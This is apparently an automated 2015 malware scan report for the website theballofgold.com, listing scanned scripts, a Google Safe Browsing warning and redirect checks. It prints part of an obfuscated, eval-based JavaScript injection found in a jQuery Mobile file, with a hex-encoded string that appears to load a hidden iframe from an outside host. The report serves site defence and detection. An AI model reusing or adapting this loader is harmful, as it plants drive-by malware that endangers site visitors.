Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=theballofgold.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://theballofgold.com/ | 200 OK Content-Length: 8696 Content-Type: text/html | clean |
http://theballofgold.com/lib/klass.min.js | 200 OK Content-Length: 1191 Content-Type: text/javascript | clean |
http://theballofgold.com/lib/code.photoswipe-3.0.4.min.js | 200 OK Content-Length: 81203 Content-Type: text/javascript | clean |
http://theballofgold.com/lib/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js | 200 OK Content-Length: 186181 Content-Type: text/javascript | clean |
http://theballofgold.com/lib/jquery.mobile-1.1.0.js | 200 OK Content-Length: 4427 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0"+"x";a=0;z="y";try{a/=2}catch(q){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_77_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_77_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_6f_6d_6a_6c_71_7b_6b_77_7d_76_7c_36_71_7c_37_69_78_7a_71_74_6d_37_5e_6f_79_4e_40_52_75_7e_36_78_70_78 Antivirus reports:
| ||
http://theballofgold.com/lib/cssverticalmenu.js | 200 OK Content-Length: 1245 Content-Type: text/javascript | clean |
http://theballofgold.com/lib/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: text/javascript | clean |
http://theballofgold.com/lib/modernizr.2.5.3.min.js | 200 OK Content-Length: 15273 Content-Type: text/javascript | clean |
http://theballofgold.com/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: theballofgold.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 02:11:12 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8696
Content-Type: text/html
Last-Modified: Fri, 16 Aug 2013 21:06:27 GMT
...8696 bytes of data.
GET / HTTP/1.1
Host: theballofgold.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 02:11:12 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 8696
Content-Type: text/html
Last-Modified: Fri, 16 Aug 2013 21:06:27 GMT
...8696 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: theballofgold.com
Referer: http://www.google.com/search?q=theballofgold.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: theballofgold.com
Referer: http://www.google.com/search?q=theballofgold.com
Result:
The result is similar to the first query. There are no suspicious redirects found.